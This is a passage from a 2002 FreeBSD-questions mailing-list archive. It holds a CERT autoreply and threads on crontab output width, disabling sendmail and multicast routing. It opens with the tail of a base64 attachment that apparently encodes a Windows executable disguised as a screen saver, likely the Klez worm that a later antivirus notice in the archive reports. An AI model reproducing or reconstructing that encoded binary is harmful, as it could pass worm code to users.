AAD///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAPoAAAAAAAAAAAAAAAAAAAD6AAAAAAAAAAAAAAAAAAAPqqAAAAAAAAAAAAAAAAAAD6qgAAAA AAAAAAAAAAAAAPqqqgAAAAAAAAAAAAAAAAD6qqoAAAAAAAAAAAAAAAAPqqqqoAAAAAAAAAAAAAAA +qqqqqoAAAAAAAAAAAAAD6qqqqqqoAAAAAAAAAAAAA+qqqqqqqAAAAAAAAAAAAD6qqqqqqqqAAAA AAAAAAAPqqqqqqqqqqAAAAAAAAAA+qqqqqqqqqqqAAAAAAAAD6qqqqqqqqqqqqAAAAAAAPqqqqqq qqqqqqqqAAAAAAD6qqqqqqqqqqqqqgAAAAAPqqqqqqqqqqqqqqqgAAAAD6qqqqqqqqqqqqqqoAAA APqqqqqqqqqqqqqqqqoAAAD6qqqqqqqvqqqqqqqqAAAA+qqqqqqqAPqqqqqqqgAAAPqqqqqqqgD6 qqqqqqoAAAAPqqqqqqAAD6qqqqqgAAAAD6qqqqqgAA+qqqqqoAAAAAD/qqqqAAAA/6qqqgAAAAAA AP///wAAAAD///8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAD//////////////////H////x////4P///+D////Af///wH///4A///8AH//+AA///gAP/ /wAB//4AAP/8AAB/+AAAP/AAAB/wAAAf4AAAD+AAAA/AAAAHwAAAB8ABAAfAAQAH4AOAD+ADgA/w B8Af/A/wP////////////////wAnAQAAAAEAAQAgIBAAAQAEAOgCAAABAPAgAQAoAzQAAABWAFMA XwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAUAAgAAAAAABQACAAAAPwAA AAAAAAAEAAQAAQAAAAAAAAAAAAAAAAAAAIgCAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYA bwAAAGQCAAABADAANAAwADkAMAA0AGIAMAAAADIADQABAEMAbwBtAG0AZQBuAHQAcwAAAFMAYwBy AGUAZQBuACAAUwBhAHYAZQByAAAAAABIABQAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAHcA dwB3AC4AcwBjAHIAZQBlAG4AcwBhAHYAZQByAC4AYwBvAG0AAABCAA0AAQBGAGkAbABlAEQAZQBz AGMAcgBpAHAAdABpAG8AbgAAAAAAUwBjAHIAZQBlAG4AIABTAGEAdgBlAHIAAAAAADYACwABAEYA aQBsAGUAVgBlAHIAcwBpAG8AbgAAAAAANQAsACAAMAAsACAAMAAsACAAMgAAAAAAIAAAAAEASQBu AHQAZQByAG4AYQBsAE4AYQBtAGUAAABGABEAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQA AABDAG8AcAB5AHIAaQBnAGgAdAAgAKkAIAAyADAAMAAyAAAAAAAoAAAAAQBMAGUAZwBhAGwAVABy AGEAZABlAG0AYQByAGsAcwAAAAAAKAAAAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0A ZQAAACAAAAABAFAAcgBpAHYAYQB0AGUAQgB1AGkAbABkAAAAIAAAAAEAUAByAG8AZAB1AGMAdABO AGEAbQBlAAAAAAA6AAsAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAA1ACwAIAAwACwA IAAwACwAIAAyAAAAAAAgAAAAAQBTAHAAZQBjAGkAYQBsAEIAdQBpAGwAZAAAAEQAAAABAFYAYQBy AEYAaQBsAGUASQBuAGYAbwAAAAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAJBLAE AAAAAAAAAAAAAAAA+FcBALhXAQAAAAAAAAAAAAAAAAAFWAEAyFcBAAAAAAAAAAAAAAAAABJYAQDQ VwEAAAAAAAAAAAAAAAAAHFgBANhXAQAAAAAAAAAAAAAAAAAkWAEA4FcBAAAAAAAAAAAAAAAAAC9Y AQDoVwEAAAAAAAAAAAAAAAAAO1gBAPBXAQAAAAAAAAAAAAAAAAAAAAAAAAAAAEZYAQBUWAEAZFgB AAAAAAByWAEAAAAAAIBYAQAAAAAAiFgBAAAAAACYWAEAAAAAAKBYAQAAAAAAdAAAgAAAAABLRVJO RUwzMi5ETEwAQURWQVBJMzIuZGxsAEdESTMyLmRsbABNUFIuZGxsAFVTRVIzMi5kbGwAV0lOSU5F VC5kbGwAV1MyXzMyLmRsbAAAAExvYWRMaWJyYXJ5QQAAR2V0UHJvY0FkZHJlc3MAAEV4aXRQcm9j ZXNzAAAAUmVnQ2xvc2VLZXkAAABCaXRCbHQAAFdOZXRDbG9zZUVudW0AAABHZXREQwAAAEludGVy bmV0R2V0Q29ubmVjdGVkU3RhdGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAANgRQ5izaH7HIOufOWeop+aHqa/SkIp62NbCKU2XgGrJis0GOf4qVvW5RBLWo14UEMXXdbRJz vzXaGzYb5wmBpy+VGukppiWpsVDNGeGsvureQWY9OM17lBx4SXkXtT3iRt7r1afKnXfk9UKGv9k2 B1lLJrEoM65SlIQTL6suLHdDIuTyTGy81wA9OrAWd1tD23ZxBMlM5TmHRGbQoH0M+Aj15BPGdwTq mhM4NutwOeIiQFNuQISvjcvkPODpT3d1NVHI1ae56hW848aNQlrWtJUJ6A3UEl4r3+D5BZw01nUE YPj3xLi7cEBYO1FOfhPnWaOxJratFDer+WygFi1f81pSNxvZv2NtcB29FjjcgFPVCqjDVxPHa+wC m1tbOD1bfe131++Z+AIkOjwsXULHCV5S7AwweXMRwA3zgAbmOqNi0ibB8xJHltnR0BE6FiK6r+8M BtHcxagYa12igYZVGsEkCks2fssR03PXQEqd35I7cwuh7RY2Uze7yQ5fJADAtu0vJbfkEMmxtx8K KKYAJdzECBI4fjLQIbfLHkGT2ccIzguT6yZfiaWGzsmA32VwOfK5EalL9AGDahwm3jYbDBxqYEUl 1vKSveZo2zOV5AuAN/m8MG2igm3f8o4rSQbFxoM9c/MYq9BNMatxMM314mEDGdK9bgo8vqjOfBy4 bb6qRh6G4gF0T4vl3s9eZxKJMR+/aZKd9rfaU4Y6pCtgHAUH1PerJAnTBMlzS9DClPPpcNoo2CkI 3Z6/Mwbn6HqcY0eCCSP51IgL0T70xz5tXSEvxOHps7olqwd39CMPN1U7yZr295xHCHs7eQx0lLnV 4ZIdZjrHQTombi44u2QT5HSV8CViA5V5wFSoo1WfMp/0Ve+KOJDXrsh5afQGeS5Yi8LRtkGNzGPj 1MLGyY2GfaQff9WZ93kh7eDuLYVsnFid06DV3JrW0JN07LJUnyzS6iGRMw/A6uSIpXIC3VlktWlU UbxWJGU+CXO4PLiEiz8ociwETSLsyxnrW13AsikgPC3rkiH2K6YM2yuNlNSvGYSgnSNIPeEErREm ZPQLgWfcZzpkqnN+jwxpYYrh06/5sUW2BerwQR0qr8/eUnH1DPRN9j9dq8DLFpwQJG9UgTIGZ3VA bZ8kY7OWhNfuq8nlgWRfRvOu8r6ymyI4UjSrJUP0SmLooblVTeUPNbFCGV0uYSVsM/EdWSta2cGZ sN8LBF4B06HPzDFk0Eiy5n7TL0w4IKfL3BnIM1PnjZT3d21CL5wu4/UlUxPEdEfEWdu9qgmMCbBj gfc9IUp0gOuxabE5l8Y3Xjrd9pROt6iM4rfPRRZO3lS9JjiDOzTFFKRZllqxDyo5oVCKHM7I9IxE dbp7qH12FFvo04NyiNmhKkq+4RpjS02GlneCXyxRS3qQEHmHVqTaYZIVZAIrarMusp4zSBRkGvkl ShmJjUzasUwNTHS3t6TdxtKlINsW7iV1OesDd0QIDNweg268prLrN4Q9YX8GCLCwafilPJS1odRB 72vQ3wJtHIZ6WEItHhJy7rCETQVMrsrBMHrq4VHmz+dpKGNDo9O1wQYf1bcY0ohCeLADSos4R2Nu H37YdiS044baXWeBuPerdqDnalzFoy9i5iN2k8mSjxg/kqHfNyrOzdPzqKNfp70icx5Qf2Ax1pJw hGHkpdXXwe+WRbUelIocmkk/CA0T8bMx7qSCzCgccQWmwqvgarUapSULLnWWqEgdfYkOp+n4JhPs mVIl+EeMr0Oo4nRB9UMarGLTu1h3dHa1CDImSeqNWWubj4CvZKPc6QA6H9kmQFqfkUJQnqc4Q+1G WSjQuC348S+Gd40gtFgL9wR6CGK64Xg+pnVnowtsLQpFRMWrmfXk60XQiHYCFzq8VPE2ZiSDcPbK IF1jsjNxAn3XpNOj1Y9dkO3cSeib5rLz8RZki1r5d2ZQkn5nKscdICtnvjJRVm3VMmkASY6bLI6e Amre2V+At8GHEFtKDy4MO7avh6eLy12sWmzFL7OsUvG5tJPg7Av17EbYB80XZtcFhlL4QFeADH+A Q5Lil90rvIaWIp7PC8NdPkEdbuTIBkdTGEQUFpxsaAmEBHifa9ujDpEwlGeTmE9fOpQfQapokenq QRnZ --vxtjist-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 4:37:34 2002 Delivered-To: freebsd-questions@freebsd.org Received: from beniaminus.red.cert.org (beniaminus.red.cert.org [192.88.209.10]) by hub.freebsd.org (Postfix) with ESMTP id 0E73037B401 for ; Mon, 24 Jun 2002 04:37:22 -0700 (PDT) Received: from timotheus.indigo.cert.org (timotheus.indigo.cert.org [192.88.209.150]) by beniaminus.red.cert.org (8.11.6/8.11.6/1.5) with ESMTP id g5OBbLj02147 for ; Mon, 24 Jun 2002 07:37:21 -0400 Received: (from mailnull@localhost) by timotheus.indigo.cert.org (8.9.3/8.9.3/2.14) id HAA09758; Mon, 24 Jun 2002 07:37:09 -0400 (EDT) Message-Id: <200206241137.HAA09758@timotheus.indigo.cert.org> From: "CERT(R) Coordination Center" Reply-To: "CERT(R) Coordination Center" Date: Mon, 24 Jun 2002 07:37:09 EDT To: questions Subject: Re: Some questions X-Cert-Autoreply: <200206241145.g5OBjAZ40273@www.pnu.ac.ir> References: <200206241145.g5OBjAZ40273@www.pnu.ac.ir> In-Reply-To: <200206241145.g5OBjAZ40273@www.pnu.ac.ir> from Questions on Mon, 24 Jun 2002 16:15:14 +0430 (IRST) Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG -----BEGIN PGP SIGNED MESSAGE----- *************************************************************************** [NOTE -- THIS IS AN AUTOMATED RESPONSE] Thank you for contacting the CERT(R) Coordination Center. We appreciate your contacting us and consider your communications with us to be very important. Because we focus our response efforts to have the greatest impact on the Internet community, we may be unable to provide you with a personal response to your message. Please review the pointers contained in this message for information which may be of immediate use to you. Section A - CERT/CC Current Activity Section B - Incident Reporting Information Section C - Vulnerability Reporting Information If you need additional information from the CERT/CC, we encourage you to begin by looking at our list of CERT/CC Frequently Asked Questions: http://www.cert.org/faq/cert_faq.html ====================================================================== Section A - CERT/CC Current Activity The CERT/CC Current Activity web page provides a summary list of the most frequent types of incident and vulnerability activity currently being reported to the CERT/CC. Please refer to this regularly updated page to obtain immediate assistance in response to frequently reported activity: http://www.cert.org/current/current_activity.html In addition, the latest CERT/CC documents can be found at: * CERT Advisories - http://www.cert.org/advisories/ * CERT Incident Notes - http://www.cert.org/incident_notes/ * CERT Vulnerability Notes - http://www.kb.cert.org/vuls/ * CERT Summaries - http://www.cert.org/summaries/ * CERT Tech Tips - http://www.cert.org/tech_tips/ * What's New - http://www.cert.org/nav/whatsnew.html * CERT/CC Web Site - http://www.cert.org/ For pointers to information about computer viruses and hoaxes, please see: * http://www.cert.org/other_sources/viruses.html ====================================================================== Section B - Incident Reporting Information We appreciate receiving incident reports because it helps us to gain a better understanding of ongoing intruder activities and attack profiles. From the information we receive, we are able to identify and address critical security issues within the Internet community. Because we prioritize our response efforts to have the greatest impact on the Internet community, we are not be able to provide everyone with a personal response. For general information about reporting incidents to the CERT/CC, please see our Incident Reporting Guidelines at: http://www.cert.org/tech_tips/incident_reporting.html To report incidents to the CERT/CC, please send information about the incident in plain text format to cert@cert.org. You may wish to use our Incident Reporting Form, located at: http://www.cert.org/reporting/incident_form.txt The CERT/CC considers the following types of incidents to be emergencies: * possible life-threatening activity * attacks on the Internet infrastructure, such as: - root name servers - domain name servers - major archive sites - network access points (NAPs) * widespread automated attacks against Internet sites * new types of attacks or new vulnerabilities If you are reporting such an emergency outside our operational hours - business days between 08:00-17:00 EST/EDT (GMT-5/GMT-4) and require immediate assistance, then please call the CERT hotline: +1 412 268 7090 If you believe the intruder activity is a threat to people's lives or to the Internet infrastructure, please contact us immediately. ====================================================================== Section C - Vulnerability Reporting Information If you would like to report a new type of vulnerability or tool being used by the intruder community, we would be interested in any details that you may have. If you are able, please include any or all of source code, log files of execution, and descriptions of operating dependencies. Please feel free to submit these details in ASCII format files (where possible) of your own design, or if you prefer to use a form, please see the file: http://www.cert.org/reporting/vulnerability_form.txt Please also encrypt the report using PGP if you are able to do so. Instructions are given at the top of the reporting form. ====================================================================== CERT(R) Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh, PA USA 15213-3890 Internet e-mail: cert@cert.org (monitored during business hours) Telephone: +1-412-268-7090 24-hour hotline CERT Coordination Center personnel answer business days 08:00-17:00 EST/EDT (GMT-5)/(GMT-4), on call for emergencies during other hours. Fax: +1-412-268-6989 CERT and CERT Coordination Center are registered in U.S. Patent and Trademark Office. -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBPDNbnaCVPMXQI2HJAQHvcwQAljLIFBVtoFPoATWgbU/n5PSuz3cTT6Mw 2BEemoZN7xpQczGMDXgBapzFmTRiq3oVM1aSbpKZ6W8CGjoCQOdxGGQ22kTpFaHK e4j+b2Juym8aOWYuEmXxaw9MVPh79Bh8eIOC3npuYEXbEvlQPRyuDyNCZq5Vwe6b Y2ubokmJD3M= =q5NW -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 4:43:37 2002 Delivered-To: freebsd-questions@freebsd.org Received: from web9906.mail.yahoo.com (web9906.mail.yahoo.com [216.136.129.249]) by hub.freebsd.org (Postfix) with SMTP id ABB1937B400 for ; Mon, 24 Jun 2002 04:43:34 -0700 (PDT) Message-ID: <20020624114334.60174.qmail@web9906.mail.yahoo.com> Received: from [80.13.63.2] by web9906.mail.yahoo.com via HTTP; Mon, 24 Jun 2002 13:43:34 CEST Date: Mon, 24 Jun 2002 13:43:34 +0200 (CEST) From: =?iso-8859-1?q?Farid=20Nicolas?= Reply-To: fd_nicolas@yahoo.fr Subject: Question about crontab. To: questions@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG hello, i have a problem when i use crontab on my freebsd. I want to execute a program every day. this program write the result of a "ps" in a text file. When i use crontab, i can see only 80 characters of this text file whereas when I execute it directly i can read all the file. I tried to change the term ENV variable and I put "TERM=xterm-color" but i don't think that freebsd crontab accept the definition of an environnment variable by a user. I don't know what can I do. Can you help me please. Thanks a lot. Farid NICOLAS. ___________________________________________________________ Do You Yahoo!? -- Une adresse @yahoo.fr gratuite et en français ! Yahoo! Mail : http://fr.mail.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 4:57:52 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.thundernet.cz (mail.thundernet.cz [62.77.87.114]) by hub.freebsd.org (Postfix) with SMTP id 529CC37B403 for ; Mon, 24 Jun 2002 04:57:48 -0700 (PDT) Received: (qmail 10975 invoked from network); 24 Jun 2002 11:56:00 -0000 Received: from unknown (HELO freepuppy.bellavista.cz) (62.168.44.50) by mail.thundernet.cz with SMTP; 24 Jun 2002 11:56:00 -0000 Received: from freepuppy.bellavista.cz (localhost.bellavista.cz [127.0.0.1]) by freepuppy.bellavista.cz (8.12.4/8.11.6) with ESMTP id g5OBvG4o034803; Mon, 24 Jun 2002 13:57:24 +0200 (CEST) (envelope-from neuhauser@bellavista.cz) Received: (from roman@localhost) by freepuppy.bellavista.cz (8.12.4/8.12.4/Submit) id g5OBv3wG034802; Mon, 24 Jun 2002 13:57:03 +0200 (CEST) X-Authentication-Warning: freepuppy.bellavista.cz: roman set sender to neuhauser@bellavista.cz using -f Date: Mon, 24 Jun 2002 13:57:03 +0200 From: Roman Neuhauser To: Farid Nicolas Cc: questions@freebsd.org Subject: Re: Question about crontab. Message-ID: <20020624115703.GF328@freepuppy.bellavista.cz> Mail-Followup-To: Farid Nicolas , questions@freebsd.org References: <20020624114334.60174.qmail@web9906.mail.yahoo.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020624114334.60174.qmail@web9906.mail.yahoo.com> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > Date: Mon, 24 Jun 2002 13:43:34 +0200 (CEST) > From: Farid Nicolas > Subject: Question about crontab. > To: questions@freebsd.org > > hello, > > i have a problem when i use crontab on my freebsd. > > I want to execute a program every day. this program > write the result of a "ps" in a text file. When i use > crontab, i can see only 80 characters of this text > file whereas when I execute it directly i can read > all the file. post the actual script, your crontab, and the output. -- FreeBSD 4.6-STABLE 1:55PM up 10:55, 13 users, load averages: 0.02, 0.01, 0.00 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 5: 2:43 2002 Delivered-To: freebsd-questions@freebsd.org Received: from server.rucus.ru.ac.za (server.rucus.ru.ac.za [146.231.115.1]) by hub.freebsd.org (Postfix) with SMTP id 5B09137B400 for ; Mon, 24 Jun 2002 05:02:36 -0700 (PDT) Received: (qmail 92954 invoked from network); 24 Jun 2002 12:02:19 -0000 Received: from shell-fxp1.rucus.ru.ac.za (HELO shell.rucus.ru.ac.za) (10.0.0.1) by server.rucus.ru.ac.za with SMTP; 24 Jun 2002 12:02:19 -0000 Received: (qmail 24237 invoked by uid 10032); 24 Jun 2002 12:02:19 -0000 Date: Mon, 24 Jun 2002 14:02:19 +0200 From: =?iso-8859-1?Q?David_Sieb=F6rger?= To: Farid nicolas Cc: questions@freebsd.org Subject: Re: Question about crontab. Message-ID: <20020624140219.C22610@rucus.ru.ac.za> References: <20020624114334.60174.qmail@web9906.mail.yahoo.com> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2.5.1i In-Reply-To: <20020624114334.60174.qmail@web9906.mail.yahoo.com>; from fd_nicolas@yahoo.fr on Mon, Jun 24, 2002 at 01:43:34PM +0200 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Mon 2002-06-24 (13:43), Farid nicolas wrote: > i have a problem when i use crontab on my freebsd. > > I want to execute a program every day. this program > write the result of a "ps" in a text file. When i use > crontab, i can see only 80 characters of this text > file whereas when I execute it directly i can read > all > the file. You need to use the -w or -ww options. From ps(1): -w Use 132 columns to display information, instead of the default which is your window size. If the -w option is specified more than once, ps will use as many columns as necessary without regard for your window size. This topic was discussed on this list a little while ago under the subject "grep and console width". The thread starts at: http://docs.freebsd.org/cgi/getmsg.cgi?fetch=1197521+0+archive/2002/freebsd-questions/20020602.freebsd-questions -- David Siebörger drs@rucus.ru.ac.za To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 5:16: 8 2002 Delivered-To: freebsd-questions@freebsd.org Received: from relay1.ntu-kpi.kiev.ua (www.ntu-kpi.kiev.ua [212.111.192.161]) by hub.freebsd.org (Postfix) with ESMTP id 4746D37B401 for ; Mon, 24 Jun 2002 05:16:04 -0700 (PDT) Received: from primula.ntu-kpi.kiev.ua (if100Mbit.primula.ntu-kpi.kiev.ua [10.100.5.1]) by relay1.ntu-kpi.kiev.ua (Postfix) with ESMTP id 2B8FC19D69 for ; Mon, 24 Jun 2002 15:15:58 +0300 (EEST) Received: from Inc (budun.primula.ntu-kpi.kiev.ua [10.100.163.4]) by primula.ntu-kpi.kiev.ua (8.11.6/8.11.6) with SMTP id g5OCFsu10337 for ; Mon, 24 Jun 2002 15:15:54 +0300 (EEST) (envelope-from Andron@primula.ntu-kpi.kiev.ua) Date: Mon, 24 Jun 2002 15:15:54 +0300 (EEST) Message-Id: <200206241215.g5OCFsu10337@primula.ntu-kpi.kiev.ua> From: drweb@primula.ntu-kpi.kiev.ua To: freebsd-questions@freebsd.org Subject: Spice girls' vocal concert MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Message sent from infected by virus and has not been delivered. Viruses: ÉÎÆÉÃÉÒÏ×ÁÎ Win32.HLLM.Klez.4 Original message was stored in the archive. To receive original message please contact postmaster: drweb@primula.ntu-kpi.kiev.ua Archive record: archive.msg.90u0wL Antivirus service provided by Dr.Web Daemon (www.sald.com) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 5:23:53 2002 Delivered-To: freebsd-questions@freebsd.org Received: from out017.verizon.net (out017pub.verizon.net [206.46.170.94]) by hub.freebsd.org (Postfix) with ESMTP id B352C37B403 for ; Mon, 24 Jun 2002 05:23:46 -0700 (PDT) Received: from Paquita ([151.204.242.175]) by out017.verizon.net (InterMail vM.5.01.04.05 201-253-122-122-105-20011231) with ESMTP id <20020624122309.VNYH4922.out017.verizon.net@Paquita>; Mon, 24 Jun 2002 07:23:09 -0500 Message-ID: <200206240823450857.03A79036@smtp.verizon.net> In-Reply-To: References: X-Mailer: Calypso Version 3.30.00.00 (4) Date: Mon, 24 Jun 2002 08:23:45 -0400 Reply-To: Palan.Gana@verizon.net From: =?us-ascii?Q?=22Pal=E1n_Gana=22?= To: john@kozubik.com, tdv94ped@cs.umu.se Cc: freebsd-questions@FreeBSD.ORG Subject: Re: Syslog and sendmail Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Should be: sendmail_enable=3D"NONE" With "NO" some sendmail daemons will still start. See /etc/defaults/rc.conf. Regards. Pal=E1n *********** REPLY SEPARATOR *********** On 6/24/2002 at 2:06 AM John Kozubik wrote: >Hello, > >Yes, if you want sendmail turned off, you need only add one entry to >/etc/rc.conf, and that is: > >sendmail_enable=3D"NO" > >Once you have placed that entry into /etc/rc.conf, run the command `ps >auxw | grep sendmail` and if it is running, look at the PID and then run >`kill -9 (sendmail PID)` > >Now you know that sendmail is not running, because `ps auxw | grep >sendmail` will not show any sendmail processes running. By killing the >running sendmail (if there is indeed one running) you remove the need to >reboot to have that new value in /etc/rc.conf apply. > >On future reboots, sendmail will not start. However, you should continue >to get your `periodic` emails. > >----- >John Kozubik - john@kozubik - http://www.kozubik.com > > > > >On Mon, 24 Jun 2002, Paul Everlund wrote: > >> Hi! >> >> In 4.6 quite much, when it comes to sendmail, has changed. Did >> read the handbook, but I unfortunately did not find what I was >> looking. (Probably looking in the wrong place.) >> >> As I do not use any mail from my FreeBSD computer, I did put >> sendmail_enable=3D"NONE". But it seems that did prevent me from >> getting mail from periodic. In 4.5 I had sendmail_enable=3D"NO" >> and it did work. >> >> Should I change it to sendmail_enable=3D"NO" in 4.6 to recieve >> these mails? Without changing anything else, can I be sure >> no one can use my server as a relay or sending me mail from >> the outside? >> >> Am a bit confused so I hope someone can help me out! >> >> Thanks in advance. >> >> Best regards, >> Paul >> >> >> To Unsubscribe: send mail to majordomo@FreeBSD.org >> with "unsubscribe freebsd-questions" in the body of the message >> > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-questions" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 5:28:37 2002 Delivered-To: freebsd-questions@freebsd.org Received: from malkav.snowmoon.com (malkav.snowmoon.com [209.23.60.62]) by hub.freebsd.org (Postfix) with SMTP id CD38737B403 for ; Mon, 24 Jun 2002 05:28:31 -0700 (PDT) Received: (qmail 88354 invoked from network); 24 Jun 2002 12:28:31 -0000 Received: from localhost.snowmoon.com (HELO localhost) (127.0.0.1) by localhost.snowmoon.com with SMTP; 24 Jun 2002 12:28:31 -0000 Date: Mon, 24 Jun 2002 08:28:31 -0400 (EDT) From: Jaime To: freebsd-questions@freebsd.org Subject: Sendmail & periodic in FBSD4.6 Message-ID: <20020624082147.P88249-100000@malkav.snowmoon.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I am setting up a new firewall/caching-proxy/etc. with FreeBSD 4.6 and ran into a quirk that I don't know how to deal with. I want to send the output of periodic scripts (/etc/periodic/daily, weekly, etc.) to an address on another machine. So I edited /etc/mail/aliases to include "root: foo@bar.net" and ran newaliases. I have /etc/rc.conf's sendmail_enable="NO" because I don't want incoming email and I don't want another MTA but I do want to route local email. But the email sent locally to a foreign computer's address isn't received. Instead, I get this in the firewall's /var/log/maillog: Jun 24 08:00:35 cerberus sm-mta[99845]: g5K713Jl087223: to=, delay=4+04:59:32, xdelay=00:00:00, mailer=esmtp, pri=18570406, relay=firewall.bar.net., dsn=4.0.0, stat=Deferred: Connection refused by firewall.bar.net. Does this mean that setting /etc/rc.conf's sendmail_enable="NO" prevents me from sending emails from cron scripts to foo@bar.net (which is on a node other than firewall.bar.net) or that there is something else that I'm over-looking? Thanks in advance, Jaime To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 5:37:26 2002 Delivered-To: freebsd-questions@freebsd.org Received: from web.cs.ndsu.nodak.edu (web.cs.ndsu.NoDak.edu [134.129.125.7]) by hub.freebsd.org (Postfix) with ESMTP id 3FA4737B406; Mon, 24 Jun 2002 05:37:21 -0700 (PDT) Received: (from tinguely@localhost) by web.cs.ndsu.nodak.edu (8.11.4/8.11.4) id g5OCbJW11488; Mon, 24 Jun 2002 07:37:19 -0500 (CDT) (envelope-from tinguely) Date: Mon, 24 Jun 2002 07:37:19 -0500 (CDT) From: mark tinguely Message-Id: <200206241237.g5OCbJW11488@web.cs.ndsu.nodak.edu> To: ewancarr@yahoo.com, freebsd-questions@FreeBSD.ORG, multimedia@FreeBSD.ORG Subject: Re: vic/sdr - help ! Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > I'm trying to run vic (video conferning) > and sdr on FreeBSD (V4.4, IPv4) in a LAN. > > When starting up I get the message > "setsockopt- IP_ADD_MEMBERSHIP > bus send: No route to host" > cant assign requested address" > > Anyone able to help ?? which ethernet adapter are you using? (some cheap ethernet cards don't support multicast very well). you can also set a "default multicast route": route add 224.0.0.0 -netmask 0xf0000000 -interface ${hostname} but should not be needed if you have only one ethernet card. mrouted is only needed if you have multiple ethernet cards, or you are creating a DVMRP tunnel through a router to another network. I suspect the problem is in the ethernet driver not supporting multicast correctly. --mark tinguely. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Mon Jun 24 5:42: 5 2002 Delivered-To: freebsd-questions@freebsd.org Received: from smtp.a1poweruser.com (oh-chardon6a-62.clvhoh.adelphia.net [68.65.175.62]) by hub.freebsd.org (Postfix) with ESMTP id 84E0737B409 for ; Mon, 24 Jun 2002 05:40:58 -0700 (PDT) Received: from barbish (unknown [10.0.10.6]) by smtp.a1poweruser.com (Postfix) with SMTP id CF6BE30; Mon, 24 Jun 2002 08:44:16 -0400 (EDT) Reply-To: From: "Joe & Fhe Barbish" To: Cc: "FBSDQ" , Subject: RE: Frontpage Server Extensions version 5 Date: Mon, 24 Jun 